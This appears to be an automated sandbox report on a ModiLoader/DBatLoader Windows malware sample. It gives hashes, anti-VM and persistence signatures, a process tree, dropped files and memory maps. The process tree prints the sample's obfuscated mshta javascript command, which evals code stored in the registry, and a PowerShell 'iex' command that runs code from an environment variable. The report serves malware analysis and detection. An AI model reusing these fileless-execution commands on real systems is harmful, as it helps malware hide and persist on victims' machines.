Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    09-05-2024 11:49

General

  • Target

    29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

  • Size

    289KB

  • MD5

    29d53275576b5ded03ed2a1e5dc1f0cf

  • SHA1

    754da96a93a901bd9a2885b438b11989f020621b

  • SHA256

    2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a

  • SHA512

    11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

  • SSDEEP

    6144:7sd6m6EUzDxm5xO8swLLu/H5jJcvQR7ZQwClBkcdfpYWVitetEg:7sd6m6EUztodsR5jI47ZJClBkUpbl

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
  • ModiLoader Second Stage 53 IoCs
  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 48 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1660
    • C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Looks for VMWare Tools registry key
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
        "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe
          "C:\Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Looks for VMWare Tools registry key
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2588
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:dxpSbwS8="e9kmcjI";I5q3=new%20ActiveXObject("WScript.Shell");lC3FPPa="9hx";ND42st=I5q3.RegRead("HKLM\\software\\Wow6432Node\\oWkmdT9U\\osp3ZocR");Fo9arfOV="9l";eval(ND42st);O1qCYBe="wTam";
    1⤵
    • Process spawned unexpected child process
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2644
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cbfo
      2⤵
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2624
      • C:\Windows\SysWOW64\regsvr32.exe
        regsvr32.exe
        3⤵
        • Looks for VirtualBox Guest Additions in registry
        • Looks for VirtualBox drivers on disk
        • Looks for VMWare Tools registry key
        • Checks BIOS information in registry
        • Deletes itself
        • Drops startup file
        • Adds Run key to start application
        • Maps connected drives based on registry
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of WriteProcessMemory
        PID:1080
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\SysWOW64\regsvr32.exe"
          4⤵
            PID:1584

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\416844\1a6bc1.983f33d

      Filesize

      16KB

      MD5

      3725ca4cdcca4e5760a4322f0891770e

      SHA1

      5676e4505dca24e502e0ca19d0860e8ee5df32bd

      SHA256

      f012b4205cf478530338ef27db54196c52cc2773a66517382988e6bc651b2322

      SHA512

      a2370ffc00077fc890cdc41120fbc633eb321386b763b695e81bf89f364238104bd28dd47c441c9963b3123790f517fc8854b9bf87c554c59ae19ccafdb4eb30

    • C:\Users\Admin\AppData\Local\416844\7efaba.bat

      Filesize

      61B

      MD5

      a9d3ea542d72c3d4eb6e79b37f9b265e

      SHA1

      9ef048c6a4cc72891fe4b6d8c3ae59e134711cb9

      SHA256

      d287a2bcc9c2485a60329a6bb94fb260bec57524e3098a5bd7c7cedf3e460314

      SHA512

      eba879b158972749be9a48b1ff0d7393f69960da48c1f8e92c3886d9cf16ae437ac5eea449f59de788cbf5b9033ebc78311f2b591f6d41631521a3f0ea24208b

    • C:\Users\Admin\AppData\Local\416844\eecdc5.lnk

      Filesize

      881B

      MD5

      dc7d7d400a2ef3f6bd26b5b59752dc65

      SHA1

      24024493823a5eddce9744e2c0d7a1c08883ad58

      SHA256

      ddda6e501616a1507124ac030f156ba4d2701400dba1f526034dc94dbd8fc16b

      SHA512

      f08cb194d3a8fc48e79e0f2ee0aa02902ebc08ded5531bf4656baa88b2bbba0e908a59dd830c1d625eeb542a30d7d199b83b22ca9d212ecf4d45cda4b1d0aab1

    • C:\Users\Admin\AppData\Roaming\730a4b\791dbf.983f33d

      Filesize

      39KB

      MD5

      aa37b7596ed13ac91b87344631bce5b8

      SHA1

      0f873444ac01f923e70f7bef5a9b0b302787cc9d

      SHA256

      eb216409d0231346cc0b05114e632d4f8a0dfb9857a455d4f85cdf2f8e2aa863

      SHA512

      c545701e2c938174a35bc423b6053618dc11f38929a262d714717c59d52bf0cb09179fe5fa36b44c43192aaf7eb071cc57ef60b4a4731ca7377b0a4932862022

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\be0980.lnk

      Filesize

      991B

      MD5

      fecb855b47f9a96231ba51789b61f929

      SHA1

      44f9d8498b33569cac0a0a939c3dc636564cea06

      SHA256

      9a45685f97f6534d880ced46ede455e8ef78877ab1bbef76986335309eddd3c7

      SHA512

      94307f8bb949464855a8a7088a4f3f1d70232006f2dc57f85567963a9253056b589de203fb5244ef8de53a8122dcdcc61c5533b7ec85b33805b9339cebd09bff

    • \Users\Admin\AppData\Roaming\FF32A6D9-ACAE-42F5-AE3C-A6CAF0BDEBA9\29d53275576b5ded03ed2a1e5dc1f0cf_JaffaCakes118.exe

      Filesize

      289KB

      MD5

      29d53275576b5ded03ed2a1e5dc1f0cf

      SHA1

      754da96a93a901bd9a2885b438b11989f020621b

      SHA256

      2bb093ea941ca8237a3e10f73497cf0f5c56982a0419b49d8b10ebd2f582ed6a

      SHA512

      11d35cf5d0589c589a7ac7ebf8cd44d03ce5a8a6ea078b5b5c0e083dcfdce22bc6d3d2a01a304cfbcec512ec0e9d5178dc1beb6241078de4f3b002a33979a27e

    • memory/1080-67-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-53-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-74-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-73-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-55-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-58-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-42-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-44-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-60-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-51-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-52-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-50-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-54-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-56-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-57-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-62-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-46-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-59-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-47-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-48-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-84-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-49-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-61-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-68-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-75-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-76-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-77-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-63-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-64-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-85-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-66-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1080-65-0x0000000000200000-0x0000000000341000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-92-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-100-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-93-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-94-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-96-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-98-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-99-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-97-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/1584-95-0x0000000000110000-0x0000000000251000-memory.dmp

      Filesize

      1.3MB

    • memory/2624-45-0x0000000006340000-0x0000000006416000-memory.dmp

      Filesize

      856KB

    • memory/2624-41-0x0000000006340000-0x0000000006416000-memory.dmp

      Filesize

      856KB

    • memory/2864-22-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-18-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-2-0x0000000000400000-0x000000000043F000-memory.dmp

      Filesize

      252KB

    • memory/2864-16-0x0000000000400000-0x000000000043F000-memory.dmp

      Filesize

      252KB

    • memory/2864-21-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-19-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-17-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-20-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-14-0x0000000000320000-0x00000000003F6000-memory.dmp

      Filesize

      856KB

    • memory/2864-4-0x0000000000400000-0x000000000043F000-memory.dmp

      Filesize

      252KB